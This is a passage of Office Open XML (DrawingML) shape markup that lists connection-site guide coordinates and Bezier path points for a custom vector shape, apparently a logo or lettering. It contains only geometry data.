                <a:gd name="connsiteX14" fmla="*/ 2419807 w 4182422"/>
                <a:gd name="connsiteY14" fmla="*/ 371294 h 941357"/>
                <a:gd name="connsiteX15" fmla="*/ 2771158 w 4182422"/>
                <a:gd name="connsiteY15" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX16" fmla="*/ 2953445 w 4182422"/>
                <a:gd name="connsiteY16" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX17" fmla="*/ 2953445 w 4182422"/>
                <a:gd name="connsiteY17" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX18" fmla="*/ 3016678 w 4182422"/>
                <a:gd name="connsiteY18" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX19" fmla="*/ 3016678 w 4182422"/>
                <a:gd name="connsiteY19" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX20" fmla="*/ 2764635 w 4182422"/>
                <a:gd name="connsiteY20" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX21" fmla="*/ 2764635 w 4182422"/>
                <a:gd name="connsiteY21" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX22" fmla="*/ 2835331 w 4182422"/>
                <a:gd name="connsiteY22" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX23" fmla="*/ 2835331 w 4182422"/>
                <a:gd name="connsiteY23" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX24" fmla="*/ 2771158 w 4182422"/>
                <a:gd name="connsiteY24" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX25" fmla="*/ 1904769 w 4182422"/>
                <a:gd name="connsiteY25" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX26" fmla="*/ 2087043 w 4182422"/>
                <a:gd name="connsiteY26" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX27" fmla="*/ 2087043 w 4182422"/>
                <a:gd name="connsiteY27" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX28" fmla="*/ 2150294 w 4182422"/>
                <a:gd name="connsiteY28" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX29" fmla="*/ 2150294 w 4182422"/>
                <a:gd name="connsiteY29" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX30" fmla="*/ 1898246 w 4182422"/>
                <a:gd name="connsiteY30" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX31" fmla="*/ 1898246 w 4182422"/>
                <a:gd name="connsiteY31" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX32" fmla="*/ 1968924 w 4182422"/>
                <a:gd name="connsiteY32" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX33" fmla="*/ 1968924 w 4182422"/>
                <a:gd name="connsiteY33" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX34" fmla="*/ 1904769 w 4182422"/>
                <a:gd name="connsiteY34" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX35" fmla="*/ 3615295 w 4182422"/>
                <a:gd name="connsiteY35" fmla="*/ 270888 h 941357"/>
                <a:gd name="connsiteX36" fmla="*/ 3685026 w 4182422"/>
                <a:gd name="connsiteY36" fmla="*/ 275531 h 941357"/>
                <a:gd name="connsiteX37" fmla="*/ 3807787 w 4182422"/>
                <a:gd name="connsiteY37" fmla="*/ 357386 h 941357"/>
                <a:gd name="connsiteX38" fmla="*/ 3822687 w 4182422"/>
                <a:gd name="connsiteY38" fmla="*/ 468045 h 941357"/>
                <a:gd name="connsiteX39" fmla="*/ 3822687 w 4182422"/>
                <a:gd name="connsiteY39" fmla="*/ 635446 h 941357"/>
                <a:gd name="connsiteX40" fmla="*/ 3885920 w 4182422"/>
                <a:gd name="connsiteY40" fmla="*/ 635446 h 941357"/>
                <a:gd name="connsiteX41" fmla="*/ 3885920 w 4182422"/>
                <a:gd name="connsiteY41" fmla="*/ 736816 h 941357"/>
                <a:gd name="connsiteX42" fmla="*/ 3716656 w 4182422"/>
                <a:gd name="connsiteY42" fmla="*/ 736816 h 941357"/>
                <a:gd name="connsiteX43" fmla="*/ 3716656 w 4182422"/>
                <a:gd name="connsiteY43" fmla="*/ 693107 h 941357"/>
                <a:gd name="connsiteX44" fmla="*/ 3563206 w 4182422"/>
                <a:gd name="connsiteY44" fmla="*/ 749825 h 941357"/>
                <a:gd name="connsiteX45" fmla="*/ 3393942 w 4182422"/>
                <a:gd name="connsiteY45" fmla="*/ 603815 h 941357"/>
                <a:gd name="connsiteX46" fmla="*/ 3452529 w 4182422"/>
                <a:gd name="connsiteY46" fmla="*/ 483862 h 941357"/>
                <a:gd name="connsiteX47" fmla="*/ 3587372 w 4182422"/>
                <a:gd name="connsiteY47" fmla="*/ 457833 h 941357"/>
                <a:gd name="connsiteX48" fmla="*/ 3649691 w 4182422"/>
                <a:gd name="connsiteY48" fmla="*/ 459686 h 941357"/>
                <a:gd name="connsiteX49" fmla="*/ 3702694 w 4182422"/>
                <a:gd name="connsiteY49" fmla="*/ 462463 h 941357"/>
                <a:gd name="connsiteX50" fmla="*/ 3702694 w 4182422"/>
                <a:gd name="connsiteY50" fmla="*/ 442018 h 941357"/>
                <a:gd name="connsiteX51" fmla="*/ 3690611 w 4182422"/>
                <a:gd name="connsiteY51" fmla="*/ 388076 h 941357"/>
                <a:gd name="connsiteX52" fmla="*/ 3612503 w 4182422"/>
                <a:gd name="connsiteY52" fmla="*/ 366677 h 941357"/>
                <a:gd name="connsiteX53" fmla="*/ 3590190 w 4182422"/>
                <a:gd name="connsiteY53" fmla="*/ 367618 h 941357"/>
                <a:gd name="connsiteX54" fmla="*/ 3539954 w 4182422"/>
                <a:gd name="connsiteY54" fmla="*/ 420619 h 941357"/>
                <a:gd name="connsiteX55" fmla="*/ 3430216 w 4182422"/>
                <a:gd name="connsiteY55" fmla="*/ 420619 h 941357"/>
                <a:gd name="connsiteX56" fmla="*/ 3615295 w 4182422"/>
                <a:gd name="connsiteY56" fmla="*/ 270888 h 941357"/>
                <a:gd name="connsiteX57" fmla="*/ 2404018 w 4182422"/>
                <a:gd name="connsiteY57" fmla="*/ 269903 h 941357"/>
                <a:gd name="connsiteX58" fmla="*/ 2547213 w 4182422"/>
                <a:gd name="connsiteY58" fmla="*/ 331283 h 941357"/>
                <a:gd name="connsiteX59" fmla="*/ 2547213 w 4182422"/>
                <a:gd name="connsiteY59" fmla="*/ 282943 h 941357"/>
                <a:gd name="connsiteX60" fmla="*/ 2718330 w 4182422"/>
                <a:gd name="connsiteY60" fmla="*/ 282943 h 941357"/>
                <a:gd name="connsiteX61" fmla="*/ 2718330 w 4182422"/>
                <a:gd name="connsiteY61" fmla="*/ 384314 h 941357"/>
                <a:gd name="connsiteX62" fmla="*/ 2654158 w 4182422"/>
                <a:gd name="connsiteY62" fmla="*/ 384314 h 941357"/>
                <a:gd name="connsiteX63" fmla="*/ 2654158 w 4182422"/>
                <a:gd name="connsiteY63" fmla="*/ 692121 h 941357"/>
                <a:gd name="connsiteX64" fmla="*/ 2616030 w 4182422"/>
                <a:gd name="connsiteY64" fmla="*/ 866968 h 941357"/>
                <a:gd name="connsiteX65" fmla="*/ 2423513 w 4182422"/>
                <a:gd name="connsiteY65" fmla="*/ 941357 h 941357"/>
                <a:gd name="connsiteX66" fmla="*/ 2226352 w 4182422"/>
                <a:gd name="connsiteY66" fmla="*/ 789773 h 941357"/>
                <a:gd name="connsiteX67" fmla="*/ 2336114 w 4182422"/>
                <a:gd name="connsiteY67" fmla="*/ 789773 h 941357"/>
                <a:gd name="connsiteX68" fmla="*/ 2423513 w 4182422"/>
                <a:gd name="connsiteY68" fmla="*/ 844657 h 941357"/>
                <a:gd name="connsiteX69" fmla="*/ 2522107 w 4182422"/>
                <a:gd name="connsiteY69" fmla="*/ 797229 h 941357"/>
                <a:gd name="connsiteX70" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY70" fmla="*/ 705141 h 941357"/>
                <a:gd name="connsiteX71" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY71" fmla="*/ 688403 h 941357"/>
                <a:gd name="connsiteX72" fmla="*/ 2401201 w 4182422"/>
                <a:gd name="connsiteY72" fmla="*/ 737714 h 941357"/>
                <a:gd name="connsiteX73" fmla="*/ 2191955 w 4182422"/>
                <a:gd name="connsiteY73" fmla="*/ 507983 h 941357"/>
                <a:gd name="connsiteX74" fmla="*/ 2204978 w 4182422"/>
                <a:gd name="connsiteY74" fmla="*/ 416857 h 941357"/>
                <a:gd name="connsiteX75" fmla="*/ 2404018 w 4182422"/>
                <a:gd name="connsiteY75" fmla="*/ 269903 h 941357"/>
                <a:gd name="connsiteX76" fmla="*/ 338260 w 4182422"/>
                <a:gd name="connsiteY76" fmla="*/ 189573 h 941357"/>
                <a:gd name="connsiteX77" fmla="*/ 245317 w 4182422"/>
                <a:gd name="connsiteY77" fmla="*/ 446957 h 941357"/>
                <a:gd name="connsiteX78" fmla="*/ 431200 w 4182422"/>
                <a:gd name="connsiteY78" fmla="*/ 446957 h 941357"/>
                <a:gd name="connsiteX79" fmla="*/ 1408353 w 4182422"/>
                <a:gd name="connsiteY79" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX80" fmla="*/ 1408353 w 4182422"/>
                <a:gd name="connsiteY80" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX81" fmla="*/ 1469732 w 4182422"/>
                <a:gd name="connsiteY81" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX82" fmla="*/ 1715247 w 4182422"/>
                <a:gd name="connsiteY82" fmla="*/ 402075 h 941357"/>
                <a:gd name="connsiteX83" fmla="*/ 1469732 w 4182422"/>
                <a:gd name="connsiteY83" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX84" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY84" fmla="*/ 135153 h 941357"/>
                <a:gd name="connsiteX85" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY85" fmla="*/ 135153 h 941357"/>
                <a:gd name="connsiteX86" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY86" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX87" fmla="*/ 3343908 w 4182422"/>
                <a:gd name="connsiteY87" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX88" fmla="*/ 3343908 w 4182422"/>
                <a:gd name="connsiteY88" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX89" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY89" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX90" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY90" fmla="*/ 558285 h 941357"/>
                <a:gd name="connsiteX91" fmla="*/ 3285320 w 4182422"/>
                <a:gd name="connsiteY91" fmla="*/ 635479 h 941357"/>
                <a:gd name="connsiteX92" fmla="*/ 3344847 w 4182422"/>
                <a:gd name="connsiteY92" fmla="*/ 635479 h 941357"/>
                <a:gd name="connsiteX93" fmla="*/ 3344847 w 4182422"/>
                <a:gd name="connsiteY93" fmla="*/ 736848 h 941357"/>
                <a:gd name="connsiteX94" fmla="*/ 3284381 w 4182422"/>
                <a:gd name="connsiteY94" fmla="*/ 736848 h 941357"/>
                <a:gd name="connsiteX95" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY95" fmla="*/ 580595 h 941357"/>
                <a:gd name="connsiteX96" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY96" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX97" fmla="*/ 3049091 w 4182422"/>
                <a:gd name="connsiteY97" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX98" fmla="*/ 3049091 w 4182422"/>
                <a:gd name="connsiteY98" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX99" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY99" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX100" fmla="*/ 2833452 w 4182422"/>
                <a:gd name="connsiteY100" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX101" fmla="*/ 2954359 w 4182422"/>
                <a:gd name="connsiteY101" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX102" fmla="*/ 2954359 w 4182422"/>
                <a:gd name="connsiteY102" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX103" fmla="*/ 2833452 w 4182422"/>
                <a:gd name="connsiteY103" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX104" fmla="*/ 1967060 w 4182422"/>
                <a:gd name="connsiteY104" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX105" fmla="*/ 2087965 w 4182422"/>
                <a:gd name="connsiteY105" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX106" fmla="*/ 2087965 w 4182422"/>
                <a:gd name="connsiteY106" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX107" fmla="*/ 1967060 w 4182422"/>
                <a:gd name="connsiteY107" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX108" fmla="*/ 275065 w 4182422"/>
                <a:gd name="connsiteY108" fmla="*/ 67826 h 941357"/>
                <a:gd name="connsiteX109" fmla="*/ 401442 w 4182422"/>
                <a:gd name="connsiteY109" fmla="*/ 67826 h 941357"/>
                <a:gd name="connsiteX110" fmla="*/ 625402 w 4182422"/>
                <a:gd name="connsiteY110" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX111" fmla="*/ 677400 w 4182422"/>
                <a:gd name="connsiteY111" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX112" fmla="*/ 677400 w 4182422"/>
                <a:gd name="connsiteY112" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX113" fmla="*/ 437686 w 4182422"/>
                <a:gd name="connsiteY113" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX114" fmla="*/ 437686 w 4182422"/>
                <a:gd name="connsiteY114" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX115" fmla="*/ 501792 w 4182422"/>
                <a:gd name="connsiteY115" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX116" fmla="*/ 468335 w 4182422"/>
                <a:gd name="connsiteY116" fmla="*/ 545452 h 941357"/>
                <a:gd name="connsiteX117" fmla="*/ 209085 w 4182422"/>
                <a:gd name="connsiteY117" fmla="*/ 545452 h 941357"/>
                <a:gd name="connsiteX118" fmla="*/ 175639 w 4182422"/>
                <a:gd name="connsiteY118" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX119" fmla="*/ 239765 w 4182422"/>
                <a:gd name="connsiteY119" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX120" fmla="*/ 239765 w 4182422"/>
                <a:gd name="connsiteY120" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX121" fmla="*/ 0 w 4182422"/>
                <a:gd name="connsiteY121" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX122" fmla="*/ 0 w 4182422"/>
                <a:gd name="connsiteY122" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX123" fmla="*/ 52059 w 4182422"/>
                <a:gd name="connsiteY123" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX124" fmla="*/ 3936902 w 4182422"/>
                <a:gd name="connsiteY124" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX125" fmla="*/ 4119164 w 4182422"/>
                <a:gd name="connsiteY125" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX126" fmla="*/ 4119164 w 4182422"/>
                <a:gd name="connsiteY126" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX127" fmla="*/ 4182422 w 4182422"/>
                <a:gd name="connsiteY127" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX128" fmla="*/ 4182422 w 4182422"/>
                <a:gd name="connsiteY128" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX129" fmla="*/ 3930378 w 4182422"/>
                <a:gd name="connsiteY129" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX130" fmla="*/ 3930378 w 4182422"/>
                <a:gd name="connsiteY130" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX131" fmla="*/ 4001074 w 4182422"/>
                <a:gd name="connsiteY131" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX132" fmla="*/ 4001074 w 4182422"/>
                <a:gd name="connsiteY132" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX133" fmla="*/ 3936902 w 4182422"/>
                <a:gd name="connsiteY133" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX134" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY134" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX135" fmla="*/ 1475304 w 4182422"/>
                <a:gd name="connsiteY135" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX136" fmla="*/ 1736636 w 4182422"/>
                <a:gd name="connsiteY136" fmla="*/ 147236 h 941357"/>
                <a:gd name="connsiteX137" fmla="*/ 1839860 w 4182422"/>
                <a:gd name="connsiteY137" fmla="*/ 402075 h 941357"/>
                <a:gd name="connsiteX138" fmla="*/ 1831511 w 4182422"/>
                <a:gd name="connsiteY138" fmla="*/ 489482 h 941357"/>
                <a:gd name="connsiteX139" fmla="*/ 1686412 w 4182422"/>
                <a:gd name="connsiteY139" fmla="*/ 692212 h 941357"/>
                <a:gd name="connsiteX140" fmla="*/ 1475304 w 4182422"/>
                <a:gd name="connsiteY140" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX141" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY141" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX142" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY142" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX143" fmla="*/ 1285595 w 4182422"/>
                <a:gd name="connsiteY143" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX144" fmla="*/ 1285595 w 4182422"/>
                <a:gd name="connsiteY144" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX145" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY145" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX146" fmla="*/ 750838 w 4182422"/>
                <a:gd name="connsiteY146" fmla="*/ 0 h 941357"/>
                <a:gd name="connsiteX147" fmla="*/ 832594 w 4182422"/>
                <a:gd name="connsiteY147" fmla="*/ 0 h 941357"/>
                <a:gd name="connsiteX148" fmla="*/ 832594 w 4182422"/>
                <a:gd name="connsiteY148" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX149" fmla="*/ 935759 w 4182422"/>
                <a:gd name="connsiteY149" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX150" fmla="*/ 935759 w 4182422"/>
                <a:gd name="connsiteY150" fmla="*/ 456258 h 941357"/>
                <a:gd name="connsiteX151" fmla="*/ 627228 w 4182422"/>
                <a:gd name="connsiteY151" fmla="*/ 456258 h 941357"/>
                <a:gd name="connsiteX152" fmla="*/ 627228 w 4182422"/>
                <a:gd name="connsiteY152" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX153" fmla="*/ 730401 w 4182422"/>
                <a:gd name="connsiteY153" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX154" fmla="*/ 730401 w 4182422"/>
                <a:gd name="connsiteY154" fmla="*/ 99437 h 941357"/>
                <a:gd name="connsiteX155" fmla="*/ 625402 w 4182422"/>
                <a:gd name="connsiteY155" fmla="*/ 140311 h 941357"/>
                <a:gd name="connsiteX156" fmla="*/ 597510 w 4182422"/>
                <a:gd name="connsiteY156" fmla="*/ 66914 h 94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182422" h="941357">
                  <a:moveTo>
                    <a:pt x="3600394" y="545242"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3534369" y="545242"/>
                    <a:pt x="3512056" y="559193"/>
                    <a:pt x="3512056" y="599184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3512056" y="607533"/>
                    <a:pt x="3513935" y="615910"/>
                    <a:pt x="3516701" y="622437"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3525078" y="643806"/>
                    <a:pt x="3544625" y="651261"/>
                    <a:pt x="3588311" y="651261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3634816" y="651261"/>
                    <a:pt x="3666445" y="641940"/>
                    <a:pt x="3687819" y="623348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3701781" y="611250"/>
                    <a:pt x="3705512" y="601959"/>
                    <a:pt x="3705512" y="574988"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3705512" y="549872"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3675736" y="547095"/>
                    <a:pt x="3629231" y="545242"/>
                    <a:pt x="3600394" y="545242"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2419807" y="371294"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2405871" y="371294"/>
                    <a:pt x="2391910" y="374071"/>
                    <a:pt x="2380740" y="378729"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2336114" y="397323"/>
                    <a:pt x="2311948" y="443828"/>
                    <a:pt x="2311948" y="507071"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2311948" y="525663"/>
                    <a:pt x="2314715" y="544255"/>
                    <a:pt x="2319386" y="560072"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2332383" y="606576"/>
                    <a:pt x="2371450" y="635403"/>
                    <a:pt x="2421660" y="635403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2490503" y="635403"/>
                    <a:pt x="2536069" y="585180"/>
                    <a:pt x="2536069" y="507983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2536069" y="425236"/>
                    <a:pt x="2490503" y="371294"/>
                    <a:pt x="2419807" y="371294"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2771158" y="283028"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2953445" y="283028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2953445" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016678" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016678" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764635" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764635" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835331" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835331" y="384399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2771158" y="384399"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1904769" y="283028"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2087043" y="283028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2087043" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150294" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150294" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898246" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898246" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968924" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968924" y="384399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1904769" y="384399"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3615295" y="270888"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3639461" y="270888"/>
                    <a:pt x="3663653" y="272754"/>
                    <a:pt x="3685026" y="275531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3748260" y="284849"/>
                    <a:pt x="3789179" y="311820"/>
                    <a:pt x="3807787" y="357386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3818956" y="383415"/>
                    <a:pt x="3822687" y="412239"/>
                    <a:pt x="3822687" y="468045"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3822687" y="635446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885920" y="635446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885920" y="736816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3716656" y="736816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3716656" y="693107"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3676675" y="732155"/>
                    <a:pt x="3630170" y="749825"/>
                    <a:pt x="3563206" y="749825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3454382" y="749825"/>
                    <a:pt x="3393942" y="697747"/>
                    <a:pt x="3393942" y="603815"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3393942" y="549872"/>
                    <a:pt x="3414402" y="508970"/>
                    <a:pt x="3452529" y="483862"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3479488" y="467124"/>
                    <a:pt x="3525078" y="457833"/>
                    <a:pt x="3587372" y="457833"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3649691" y="459686"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3657129" y="459686"/>
                    <a:pt x="3686880" y="461552"/>
                    <a:pt x="3702694" y="462463"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3702694" y="442018"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3702694" y="409462"/>
                    <a:pt x="3699927" y="399230"/>
                    <a:pt x="3690611" y="388076"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3677589" y="374114"/>
                    <a:pt x="3651570" y="366677"/>
                    <a:pt x="3612503" y="366677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3605065" y="366677"/>
                    <a:pt x="3597628" y="366677"/>
                    <a:pt x="3590190" y="367618"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3554829" y="372259"/>
                    <a:pt x="3543685" y="383415"/>
                    <a:pt x="3539954" y="420619"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3430216" y="420619"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3433922" y="312734"/>
                    <a:pt x="3485098" y="270888"/>
                    <a:pt x="3615295" y="270888"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2404018" y="269903"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2464433" y="269903"/>
                    <a:pt x="2504439" y="286662"/>
                    <a:pt x="2547213" y="331283"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2547213" y="282943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718330" y="282943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718330" y="384314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654158" y="384314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654158" y="692121"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2654158" y="785132"/>
                    <a:pt x="2644867" y="826977"/>
                    <a:pt x="2616030" y="866968"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2578842" y="918134"/>
                    <a:pt x="2518376" y="941357"/>
                    <a:pt x="2423513" y="941357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2284025" y="941357"/>
                    <a:pt x="2230083" y="899512"/>
                    <a:pt x="2226352" y="789773"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2336114" y="789773"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2342638" y="831637"/>
                    <a:pt x="2363987" y="844657"/>
                    <a:pt x="2423513" y="844657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2476542" y="844657"/>
                    <a:pt x="2505379" y="830695"/>
                    <a:pt x="2522107" y="797229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2533251" y="774899"/>
                    <a:pt x="2536069" y="754443"/>
                    <a:pt x="2536069" y="705141"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2536069" y="688403"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2492356" y="724675"/>
                    <a:pt x="2456057" y="737714"/>
                    <a:pt x="2401201" y="737714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2275648" y="737714"/>
                    <a:pt x="2191955" y="646557"/>
                    <a:pt x="2191955" y="507983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2191955" y="476381"/>
                    <a:pt x="2196626" y="445691"/>
                    <a:pt x="2204978" y="416857"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2231936" y="325711"/>
                    <a:pt x="2307278" y="269903"/>
